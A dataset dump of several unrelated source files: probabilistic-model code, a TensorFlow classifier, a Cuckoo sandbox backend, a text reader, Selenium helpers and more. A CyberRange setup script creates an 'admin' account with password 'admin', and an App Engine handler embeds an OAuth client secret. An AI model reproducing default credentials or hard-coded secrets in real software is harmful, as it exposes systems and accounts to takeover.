= util_opt.read_evidence_file('../evidence/', e_percent, 'nltcs')\n \n evid_var = evids[:,0]\n non_evid_var = np.setdiff1d(np.arange(n_variables), evid_var)\n evid_list = list(evids)\n \n evid_flag = np.full(n_variables,-1) #-1 means non evidence\n #evid_arr = np.asarray(evid_list)\n evid_flag[evids[:,0]] = evids[:,1] \n# print ('evid_flag:', evid_flag)\n# \n# print ('evid:')\n# print (evids)\n# print ('non evids:')\n# print (non_evid_var)\n# print ('evid_list', evid_list)\n \n #print (train_dataset[rand_rec])\n\n \n P_type = 'mt'\n \n if P_type == 'mt':\n '''\n ### Load the trained mixture of clt, consider as P\n '''\n print ('Start reloading MT...')\n #mt_dir = '../mt_output/'\n reload_mix_clt = load_mt(mt_dir, tum_module)\n non_evid_size = non_evid_var.shape[0]\n \n # Set information for MT\n for t in reload_mix_clt.clt_list:\n t.nvariables = non_evid_size\n # learn the junction tree for each clt\n jt = JT.JunctionTree()\n jt.learn_structure(t.topo_order, t.parents, t.cond_cpt)\n reload_mix_clt.jt_list.append(jt)\n \n # using mixture of trees as P\n model_P = reload_mix_clt\n \n #p_xy_all = np.zeros((non_evid_size, non_evid_size, 2, 2))\n #p_x_all = np.zeros((non_evid_size, 2))\n p_xy_all = np.zeros((n_variables, n_variables, 2, 2))\n p_x_all = np.zeros((n_variables, 2))\n for i, jt in enumerate(model_P.jt_list):\n p_xy = JT.get_marginal_JT(jt, evid_list, np.arange(n_variables))\n p_xy_all += p_xy * model_P.mixture_weight[i]\n\n #print (p_xy_all.shape)\n #print (p_xy_all)\n \n\n p_x_all[:,0] = p_xy_all[0,:,0,0] + p_xy_all[0,:,1,0]\n p_x_all[:,1] = p_xy_all[0,:,0,1] + p_xy_all[0,:,1,1]\n \n p_x_all[0,0] = p_xy_all[1,0,0,0] + p_xy_all[1,0,1,0]\n p_x_all[0,1] = p_xy_all[1,0,0,1] + p_xy_all[1,0,1,1]\n \n #print (p_x_all)\n\n # Normalize \n P_x_given_evid = Util.normalize1d(p_x_all)\n \n P_xy_given_evid = Util.normalize2d(p_xy_all)\n for i in xrange (non_evid_size):\n P_xy_given_evid[i,i,0,0] = p_x_all[i,0] - 1e-8\n P_xy_given_evid[i,i,1,1] = p_x_all[i,1] - 1e-8\n P_xy_given_evid[i,i,0,1] = 1e-8\n P_xy_given_evid[i,i,1,0] = 1e-8\n \n #P_xy_given_evid = Util.normalize2d(p_xy_all)\n else:\n \n print(\"Learning Chow-Liu Trees on full data ......\")\n clt_P = CLT()\n clt_P.learnStructure(full_dataset)\n \n #parents = clt_Q.parents # the structure of the tree is defined by the parents of each variables\n #topo_order = clt_Q.topo_order # the DFS order of the tree\n #cpt_Q = clt_Q.cond_cpt # The cpts of distribution Q\n \n \n # marginal_P = clt_P.xprob # the single marginals of P\n # # get the pairwise marginals of P\n # jt_P = JT.JunctionTree()\n # jt_P.learn_structure(clt_P.topo_order, clt_P.parents, clt_P.cond_cpt)\n # pair_marginal_P = JT.get_marginal_JT(jt_P, [], np.arange(n_variables))\n \n \n jt_P = JT.JunctionTree()\n jt_P.learn_structure(clt_P.topo_order, clt_P.parents, clt_P.cond_cpt)\n \n \n #P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n \n #print (P_xy_evid.shape)\n #p_xy_norm = Util.normalize2d(p_xy)\n P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n \n \n # normalize\n P_xy_given_evid = Util.normalize2d(P_xy_evid)\n P_x_given_evid = Util.normalize1d(P_x_evid)\n \n #print (P_x_given_evid)\n \n # Use half of the training data to bulid Q\n #half_data = train_dataset[:int(train_dataset.shape[0]/10),:]\n half_data = np.minimum(train_dataset[:int(train_dataset.shape[0]/10),:],1000)\n clt_Q = CLT()\n clt_Q.learnStructure(half_data)\n \n clt_Q.cond_cpt = pertub_model(clt_Q, model_type='clt', percent=perturb_rate)\n \n # Initialize R as P\n clt_R = copy.deepcopy(clt_Q)\n \n \n# '''test'''\n# #P_P = cross_entropy_evid(clt_P, clt_P, list(evids), non_evid_var)\n# P_R = cross_entropy_evid(clt_P, clt_R, list(evids), non_evid_var)\n# #print ('P||P:', P_P)\n# print ('P||R:', P_R)\n# \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n# P_e = np.sum(P_x_evid[0,:])\n# P_R2 = cross_entropy_evid_parm(clt_R, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n# print ('P||R:', P_R2*P_e)\n# ss\n \n\n #print( np.sum(clt_P.getWeights(test_dataset)) / test_dataset.shape[0])\n #print( np.sum(clt_Q.getWeights(test_dataset)) / test_dataset.shape[0])\n #print( np.sum(clt_R.getWeights(test_dataset)) / test_dataset.shape[0])\n \n\n\n\n# '''test'''\n# # using extremetly simple example (a chain) to test\n# nvariables = 3\n# topo_order = np.array([0,1,2])\n# parents = np.array([-9999,0,1]) \n# cpt_Q = np.zeros((3,2,2))\n# cpt_Q[0,0,0] = 0.3\n# cpt_Q[0,0,1] = 0.3\n# cpt_Q[0,1,0] = 0.7\n# cpt_Q[0,1,1] = 0.7\n# cpt_Q[1,0,0] = 0.2\n# cpt_Q[1,0,1] = 0.4\n# cpt_Q[1,1,0] = 0.8\n# cpt_Q[1,1,1] = 0.6\n# cpt_Q[2,0,0] = 0.3\n# cpt_Q[2,0,1] = 0.1\n# cpt_Q[2,1,0] = 0.7\n# cpt_Q[2,1,1] = 0.9\n# \n# \n# marginal_P = np.zeros((3,2))\n# marginal_P[0,0]=0.3\n# marginal_P[0,1]=0.7\n# marginal_P[1,0]=0.34\n# marginal_P[1,1]=0.66\n# marginal_P[2,0]=0.168\n# marginal_P[2,1]=0.832\n# \n# \n# cpt_R = np.copy(cpt_Q)\n# cpt_R[0,0,0] = 0.6\n# cpt_R[0,0,1] = 0.6\n# cpt_R[0,1,0] = 0.4\n# cpt_R[0,1,1] = 0.4\n# cpt_R[1,0,0] = 0.8\n# cpt_R[1,0,1] = 0.7\n# cpt_R[1,1,0] = 0.2\n# cpt_R[1,1,1] = 0.3\n# cpt_R[2,0,0] = 0.55\n# cpt_R[2,0,1] = 0.9\n# cpt_R[2,1,0] = 0.45\n# cpt_R[2,1,1] = 0.1\n# '''test end'''\n# \n\n \n \n # bulid the junction tree\n #jt = JT.JunctionTree()\n #jt.learn_structure(topo_order, parents, cpt_R)\n \n cpt_Q = clt_Q.cond_cpt\n cpt_R = clt_R.cond_cpt\n \n #args = (jt, topo_order, parents, cpt_Q, marginal_P)\n #marginal_P_blur = np.round(marginal_P, decimals = decimals)\n #pair_marginal_P_blur = np.round(pair_marginal_P, decimals = decimals)\n \n \n if blur_flag == True:\n '''apply noise to P'''\n \n '''\n Get the noise\n '''\n noise_mu = 0\n noise_std = 0.01\n noise_percent = 1\n \n# print ('dataset: ', data_name)\n# print ('mu: ', noise_mu)\n# print ('std: ', noise_std)\n# print ('percent: ', noise_percent)\n \n P_xy_given_evid_blur = util_opt.add_noise (P_xy_given_evid, n_variables, noise_mu, noise_std, percent_noise=noise_percent)\n \n #print (P_xy_given_evid.shape)\n #print (P_xy_given_evid_blur.shape)\n\n #marginal_P_blur = marginal_P\n #print (P_xy_given_evid_blur[0])\n P_xy_given_evid_full = P_xy_given_evid_blur\n P_x_given_evid_full = P_x_given_evid\n \n \n \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid_blur\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n \n \n \n #print (P_xy_given_evid_full[0])\n #print (P_x_given_evid_full)\n \n #args = (clt_R.topo_order, clt_R.parents, cpt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var)\n else:\n \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n \n \n #args = (clt_R.topo_order, clt_R.parents, cpt_Q, marginal_P, pair_marginal_P)\n \n P_xy_given_evid_full = P_xy_given_evid\n P_x_given_evid_full = P_x_given_evid\n \n \n \n \n args = (clt_R, cpt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n \n # set the bound for all variables\n bnd = (0.001,0.999)\n bounds = [bnd,]*(4*n_variables+1)\n \n x0 = np.zeros(4*n_variables+1)\n x0[0] = 0.5 # initial value for lamda\n x0[1:] = cpt_R.flatten()\n \n # constraint: valid prob\n normalize_cons = []\n for i in range (n_variables):\n \n# print (x0[i*4+1]+ x0[i*4+3])\n# print (x0[i*4+2]+ x0[i*4+4])\n \n normalize_cons.append({'type': 'eq',\n 'fun' : lambda x: np.array([x[i*4+1] + x[i*4+3] - 1, \n x[i*4+2] + x[i*4+4] - 1])})\n \n \n #print (x0)\n \n #res = minimize(objective, x0, method='SLSQP', jac=derivative, constraints=normalize_cons, # with normalization constriant\n res = minimize(objective, x0, method='SLSQP', jac=derivative, # without normalization constraint\n options={'ftol': 1e-4, 'disp': True, 'maxiter': 1000},\n bounds=bounds, args = args)\n clt_R.cond_cpt = res.x[1:].reshape(n_variables,2,2)\n clt_R.log_cond_cpt = np.log(clt_R.cond_cpt)\n \n #print (res.x[1:])\n# print ('P:')\n# print (clt_P.cond_cpt.flatten())\n# print ('Q:')\n# print(cpt_Q.flatten())\n# print ('R:') \n# print (clt_R.cond_cpt.flatten())\n\n# bnd = (0,1)\n# bounds = [bnd,]*2\n# x0 = np.array([0.5, 0])\n# res = minimize(objective, x0, method='SLSQP', jac=derivative,\n# options={'ftol': 1e-6, 'disp': True, 'maxiter': 1000},\n# bounds=bounds)\n \n \n \n print ('------Cross Entropy-------')\n \n if P_type == 'mt':\n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n# \n# P_Q = cross_entropy_evid_parm(clt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n# P_R = cross_entropy_evid_parm(clt_R, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n \n samples = util_opt.sample_from_mt_evid_posterior(model_P, n_samples, evids, non_evid_var)\n #print (clt_Q.getWeights(samples))\n #print (clt_R.getWeights(samples))\n \n P_Q = compute_cross_entropy_mt_sampling_evid(clt_Q, samples, evid_list)\n P_R = compute_cross_entropy_mt_sampling_evid(clt_R, samples, evid_list)\n else: # P is tree\n P_P = cross_entropy_evid(clt_P, clt_P, evid_list, non_evid_var)\n P_Q = cross_entropy_evid(clt_P, clt_Q, evid_list, non_evid_var)\n P_R = cross_entropy_evid(clt_P, clt_R, evid_list, non_evid_var)\n print ('P||P:', P_P)\n print ('P||Q:', P_Q)\n print ('P||R:', P_R)\n \n #return P_Q, P_R\n \n output_rec = np.array([P_Q, P_R])\n #print (output_rec.shape)\n output_file = '../output_results/'+data_name+'/clt_e_'+str(e_percent) +'_'+str(perturb_rate)\n with open(output_file, 'a') as f_handle:\n #print (\"hahah\")\n np.savetxt(f_handle, output_rec.reshape(1,2), fmt='%f', delimiter=',')\n# print ('P||P:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_P))\n# print ('P||Q:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_Q))\n# print ('P||R:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_R))\n \n# clt_S = copy.deepcopy(clt_Q)\n# if blur_flag ==True:\n# '''apply noise to P'''\n# clt_S.cond_cpt = update_S_use_P(pair_marginal_P_blur,marginal_P_blur, clt_S)\n# else:\n# clt_S.cond_cpt = update_S_use_P(pair_marginal_P,marginal_P, clt_S)\n# print ('P||S:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_S))\n\n\nif __name__==\"__main__\":\n\n# start = time.time()\n# main_opt_clt()\n# print ('Total running time: ', time.time() - start)\n\n# start = time.time()\n# n_times = 5\n# Q_arr = np.zeros(n_times)\n# R_arr = np.zeros(n_times)\n# for i in range (n_times):\n# Q_arr[i], R_arr[i] = main_opt_clt('nltcs', 0.0)\n# \n# print ('avg P||Q:', np.sum(Q_arr)/n_times)\n# print ('avg P||R:', np.sum(R_arr)/n_times)\n# print ('Total running time: ', time.time() - start)\n start = time.time()\n main_opt_clt()\n print ('Total running time: ', time.time() - start)","sub_path":"opt_clt_ss_evid.py","file_name":"opt_clt_ss_evid.py","file_ext":"py","file_size_in_byte":36733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"31991129","text":"import os\nimport sys\nimport random\nimport transaction\n\nfrom sqlalchemy import engine_from_config\n\nfrom pyramid.paster import (\n get_appsettings,\n setup_logging,\n )\n\n#from pyramid.scripts.common import parse_vars\n\nfrom cyberrange.models.core import (\n DBSession,\n Base,\n GlobalConfigs\n )\nfrom cyberrange.models.admin import (\n User,\n Group\n )\n\ndef usage(argv):\n cmd = os.path.basename(argv[0])\n print('usage: %s [var=value]\\n'\n '(example: \"%s development.ini\")' % (cmd, cmd))\n sys.exit(1)\n\n\ndef main(argv=sys.argv):\n if len(argv) < 2:\n usage(argv)\n config_uri = argv[1]\n #options = parse_vars(argv[2:])\n setup_logging(config_uri)\n #settings = get_appsettings(config_uri, options=options)\n settings = get_appsettings(config_uri)\n engine = engine_from_config(settings, 'sqlalchemy.')\n DBSession.configure(bind=engine)\n Base.metadata.create_all(engine)\n with transaction.manager:\n # Create the groups for two types of users (for now)\n auth_group = Group(u'auth', u'Regular user account.')\n admin_group = Group(u'admin', u'Administrative user account.')\n\n # Add them to the db session\n DBSession.add(auth_group)\n DBSession.add(admin_group)\n transaction.commit()\n\n # Create the admin user so we can always access the system as admin.\n su = User(first_name=u'Ixia', last_name=u'User', username=u'admin',\n email=u'admin@ixiacom.com', mobile=random.randint(2140000000, 2149999999))\n su._set_password('admin')\n su.groups.append(admin_group)\n DBSession.add(su)\n transaction.commit()\n\n # Configure global system parameters.\n config = GlobalConfigs(bps=u'192.168.0.132', metasploit=u'192.168.0.150', splunk=u'192.168.0.133',\n ips=u'', ngfw=u'192.168.0.134', dlp=u'192.168.0.140',\n windows=u'192.168.0.132', kali=u'192.168.0.170', atip=u'192.168.0.171', version=u'01.00.00')\n DBSession.add(config)\n transaction.commit()","sub_path":"CyberRange/cyberrange/scripts/initializedb.py","file_name":"initializedb.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332265725","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom tensorflow.contrib import learn\nfrom com.alodokter.cnn import data_helpers\n\nimport pymongo\nfrom pymongo import MongoClient\n\n# ===============================================================================================================\ntf.flags.DEFINE_string(\"checkpoint_dir\", \"runs/1501761743/checkpoints\", \"Checkpoint directory from training run\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nParameters:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n# ===============================================================================================================\n\nclass TextClassifier:\n def __init__(self):\n data_helpers.setup_one_hot_encoder_class('corpus/interest/')\n\n # Map data into vocabulary\n vocab_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"vocab\")\n self.vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n graph = tf.Graph()\n with graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n self.sess = tf.Session(config=session_conf)\n with self.sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(self.sess, checkpoint_file)\n\n # Get the placeholders from the graph by name\n self.input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n self.dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n self.scores = graph.get_operation_by_name(\"output/scores\").outputs[0]\n self.predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n def predict(self, text, confidence_level=0):\n x = np.array(list(self.vocab_processor.transform([data_helpers.clean_str(text)])))\n logits = tf.nn.softmax(self.scores)\n output, probability = self.sess.run([self.predictions, logits], {self.input_x: x, self.dropout_keep_prob: 1.0})\n if probability[0][output[0]] >= confidence_level:\n return data_helpers.get_class_name(output[0])\n else:\n return 'None'\n\n def tagging(self):\n client = MongoClient('[server ip]', 27017)\n db = client.alomobile\n client.alomobile.authenticate('[username]', '[password]', mechanism='SCRAM-SHA-1')\n\n questions = db.questions.find({ '_type': 'Core::Question' })\n for question in questions:\n text = question['title'] +' '+ question['content']\n print(text)\n prediction_interest = self.predict(text)\n print('tagging '+ str(question['_id']) +' with '+ prediction_interest)\n db.questions.update( { '_id': question['_id'] }, {\"$set\": { 'interest': prediction_interest }}, upsert=False )\n print('')\n","sub_path":"com/alodokter/rnn/rnn_classifier.py","file_name":"rnn_classifier.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"496452943","text":"import webapp2\n# from oauth2client.appengine import OAuth2Decorator\nimport csv\nfrom models import FeedbackEntity\nimport logging\nimport cStringIO\nimport codecs\nfrom dateutil import tz\nfrom google.appengine.api import users\nfrom oauth2client.appengine import OAuth2Decorator\nfrom models import RoleEntity\n\n# decorator = OAuth2Decorator(client_id='823696479254-mm9arog20nd675a176cvn2h7tnerom19.apps.googleusercontent.com',\n# client_secret='lSvqusP2vp0P-0-e98p8QnNy',\n# scope=['https://www.googleapis.com/auth/plus.profiles.read','https://www.googleapis.com/auth/userinfo.email'], approval_prompt='force')\nclass UnicodeWriter:\n\t\"\"\"\n\tA CSV writer which will write rows to CSV file \"f\",\n\twhich is encoded in the given encoding.\n\t\"\"\"\n\n\tdef __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n\t\t# Redirect output to a queue\n\t\tself.queue = cStringIO.StringIO()\n\t\tself.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n\t\tself.stream = f\n\t\tself.encoder = codecs.getincrementalencoder(encoding)()\n\n\tdef writerow(self, row):\n\t\tself.writer.writerow([s.encode(\"utf-8\") for s in row])\n\t\t# Fetch UTF-8 output from the queue ...\n\t\tdata = self.queue.getvalue()\n\t\tdata = data.decode(\"utf-8\")\n\t\t# ... and reencode it into the target encoding\n\t\tdata = self.encoder.encode(data)\n\t\t# write to the target stream\n\t\tself.stream.write(data)\n\t\t# empty queue\n\t\tself.queue.truncate(0)\n\n\tdef writerows(self, rows):\n\t\tfor row in rows:\n\t\t\tself.writerow(row)\n\ndecorator = OAuth2Decorator(client_id='547523974349-oalhr2lmk5fjrlrvqs52dq3uivq659bq.apps.googleusercontent.com',\n client_secret='R_JVA4UDD2DZu1XoY3S9o4P-',\n scope=['https://www.googleapis.com/auth/plus.profiles.read','https://www.googleapis.com/auth/userinfo.email'], approval_prompt='force')\n\n\nclass FeedbacksExportHandler(webapp2.RequestHandler):\n\t@decorator.oauth_aware\n\tdef get(self):\n\t\tuser = users.get_current_user()\n\t\tlogging.info(user)\n\t\tuser_email = user.email()\n\t\trole = RoleEntity.get_by_id('admin')\n\t\tmembers = role.members\n\t\tif not members:\n\t\t\tmembers = []\n\t\tif user_email not in members:\n\t\t\tlogging.critical(\"Unauthorized request : \" + user_email)\n\t\t\tself.response.write(\"Unauthorized request\")\n\t\t\treturn\n\n\t\tself.response.headers['Content-Type'] = 'application/csv;charset=UTF-8'\n\t\tself.response.headers['Content-disposition'] = 'attachment; filename=all_feedbacks.csv' \n\t\tcsv_writer = csv.writer(self.response.out, delimiter=',', quotechar='\"', quoting=csv.QUOTE_ALL)\n\t\tu_csv_writer = UnicodeWriter(self.response.out)\n\t\tqry = FeedbackEntity.query().order(-FeedbackEntity.date_created)\n\t\tfbs = qry.fetch()\n\t\tfms = []\n\t\t# csv_writer.writerow(['id','restaurant','entrie','quantity','flavor','deliverman','overall','timestamp'])\n\t\tu_csv_writer.writerow(['id','restaurant','entrie','quantity','flavor','deliverman','overall','timestamp','comment'])\n\t\tfor fb in fbs:\n\t\t\tcreated_time = fb.date_created\n\t\t\tif created_time:\n\t\t\t\tutc_zone = tz.gettz('UTC')\n\t\t\t\tcst_zone = tz.gettz('America/Chicago')\n\t\t\t\tcreated_time = created_time.replace(tzinfo=utc_zone)\n\t\t\t\tcreated_time_cst = created_time.astimezone(cst_zone)\n\t\t\t\tcreated_time_cst = created_time_cst.strftime('%Y-%m-%d')\n\t\t\telse:\n\t\t\t\tcreated_time_cst = \"\"\n\t\t\tu_csv_writer.writerow([str(fb.key.id()),fb.restaurant or \"\",fb.entrie or \"\", fb.quantity or \"\", fb.flavor or \"\", fb.deliverman or \"\", fb.overall_rating or \"\", created_time_cst, fb.comment or \"\"])\n\n\n\n\n\napp = webapp2.WSGIApplication([\n\t('/feedbacks/export', FeedbacksExportHandler),\n\t# (decorator.callback_path, decorator.callback_handler()),\n], debug=True)","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163331074","text":"# Copyright (C) 2018 Hatching B.V.\n# This file is licensed under the MIT License, see also LICENSE.\n\nimport requests\n\nfrom arbiter.backends import AnalysisBackend\n\nclass Modified(AnalysisBackend):\n def configure(self, config):\n url = config['url']\n if not url.endswith('/'):\n url += '/'\n self.cuckoo_url = url\n self.options = config.get(\"options\")\n\n def submit_artifact(self, av_id, artifact, previous_task=None):\n body = {}\n if self.options:\n body[\"options\"] = self.options\n body[\"custom\"] = artifact.url\n files = {\"file\": (artifact.name, artifact.fetch())}\n req = requests.post(self.cuckoo_url + \"v1/tasks/create/file\",\n headers={\"X-Arbiter\": self.name},\n data=body, files=files)\n req.raise_for_status()\n resp = req.json()\n if \"task_ids\" not in resp:\n raise ValueError(resp)\n return {\"task_ids\": resp[\"task_ids\"]}\n\n def health_check(self):\n req = requests.get(self.cuckoo_url + \"v1/cuckoo/status\")\n req.raise_for_status()\n data = req.json()\n report = {\n \"machinestotal\": data[\"machines\"][\"total\"],\n \"machinesused\": data[\"machines\"][\"total\"] - data[\"machines\"][\"available\"],\n }\n return report\n","sub_path":"arbiter/backends/modified.py","file_name":"modified.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163970062","text":"from liir.nlp.representation.Text import Text\n\n__author__ = 'quynhdo'\n\nclass Reader(object):\n def __init__(self, input_file):\n self.input_file=input_file\n\n def readAll(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\nclass BatchReader(Reader):\n def __init__(self, batch_size, input_file):\n Reader.__init__(self,input_file)\n self.batch_size = batch_size\n self.current_position = 0\n self.current_file = 0\n\n\n\n def readAll(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def next(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def reset(self):\n self.current_position = 0\n self.current_file = 0\n\n\nclass SimulateReader(BatchReader):\n def __init__(self, batch_size, data, input_file=None):\n BatchReader.__init__(self,batch_size,input_file)\n\n self.data = data\n\n def readAll(self):\n return self.data\n\n\n\n\nclass Conll2009BatchReader(BatchReader):\n\n def __init__(self, batch_size, input_file, read_label=True, use_gold=False):\n BatchReader.__init__(self,batch_size,input_file)\n\n self.read_label = read_label\n self.use_gold = use_gold\n\n def next(self):\n txt = Text()\n if self.current_file >= len(self.input_file):\n return txt\n\n txt.readConll2009SentencesRange(self.input_file[self.current_file], self.current_position, self.current_position + self.batch_size,\n self.read_label, self.use_gold)\n self.current_position += len(txt)\n\n while len(txt) < self.batch_size:\n self.current_position = 0\n self.current_file +=1\n if self.current_file >= len(self.input_file):\n return txt\n s1 = len(txt)\n txt.readConll2009SentencesRange(self.input_file[self.current_file], self.current_position, self.current_position + self.batch_size - len(txt),\n self.read_label, self.use_gold)\n\n self.current_position += len(txt) - s1\n\n\n\n\n return txt\n\n def readAll(self):\n txt = Text()\n for f in self.input_file:\n txt.readConll2009Sentences(f)\n return txt\n\nif __name__== \"__main__\":\n n = \"/Users/quynhdo/Desktop/ood.conll2009.pp.txt\"\n txt = Text()\n txt.readConll2009Sentences(n)\n txt.readConll2009Sentences(\"/Users/quynhdo/Desktop/eval.conll2009.pp.txt\")\n print (len(txt))\n r = Conll2009BatchReader(20,[n,\"/Users/quynhdo/Desktop/eval.conll2009.pp.txt\" ])\n num = 0\n\n txt = r.next()\n while txt is not None:\n\n num += len(txt)\n txt = r.next()\n\n print (num)\n","sub_path":"liir/nlp/io/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277767572","text":"# -*- coding: utf-8 -*-\n\nfrom component import Component\nfrom folder_create import FolderCreate\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\n\n\"\"\"\n Бар над списком писем.\n Дополнительные кнопки появляются при выделении нескольких писем.\n\"\"\"\n\n\nclass Topbar(Component):\n BASE = '//div[@class=\"portal-menu js-shortcut\"] '\n TOPBAR_BUTTONS = BASE + '//span[contains(text(), \"{}\")]'\n\n TO_FOLDER_CONTEXT_MENU = BASE + '//div[@data-qa-id=\"folders\"]'\n FOLDER_ELEM = TO_FOLDER_CONTEXT_MENU + '//a[@title=\"{}\"]'\n NEW_DIR_ELEM = TO_FOLDER_CONTEXT_MENU + \\\n '//div[@data-qa-id=\"new-folder-btn\"]'\n\n DELETE = BASE + '//*[@data-qa-id=\"delete\"]'\n SELECT_ALL_MESSAGES_BUTTON = '//*[@data-qa-id=\"select-all\"]'\n\n def move_to_folder(self, folder_name):\n top_bar_button = 'В папку'\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.FOLDER_ELEM.format(folder_name))\n ).click()\n\n def move_to_new_folder(self, folder_name):\n top_bar_button = 'В папку'\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.NEW_DIR_ELEM)\n ).click()\n\n folder_create = FolderCreate(self.driver)\n\n folder_create.set_name(folder_name)\n folder_create.submit()\n\n def move_to_archive(self):\n top_bar_button = 'В архив'\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n def delete(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.DELETE)\n ).click()\n\n def select_all(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n ec.element_to_be_clickable(\n (By.XPATH, self.SELECT_ALL_MESSAGES_BUTTON))\n ).click()\n","sub_path":"tests/components/topbar.py","file_name":"topbar.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"15262144","text":"from TAP.Simple import *\nimport json\nimport os\nimport shutil\nimport StringIO\nimport incremental101 as inc\nfrom meta101 import derive\nfrom meta101.resource import File, Json\nexecfile(\"t/dies_ok.py\")\nexecfile(\"t/tempdir.py\")\n\nplan(21)\n\n\ntmp = tempdir()\nrepo = os.path.abspath(\"t/derive/repo\")\ntargets = os.path.join(tmp, \"resources\")\nos.environ[ \"repo101dir\"] = repo\nos.environ[\"targets101dir\"] = targets\nshutil.copytree(\"t/derive/resources\", targets)\n\n\ndef reset(*lines):\n inc.instream = StringIO.StringIO(\"\".join([line + \"\\n\" for line in lines]))\n inc.outstream = StringIO.StringIO()\n\ndef file_ok(dir, file, want, name):\n try:\n with open(os.path.join(dir, file)) as 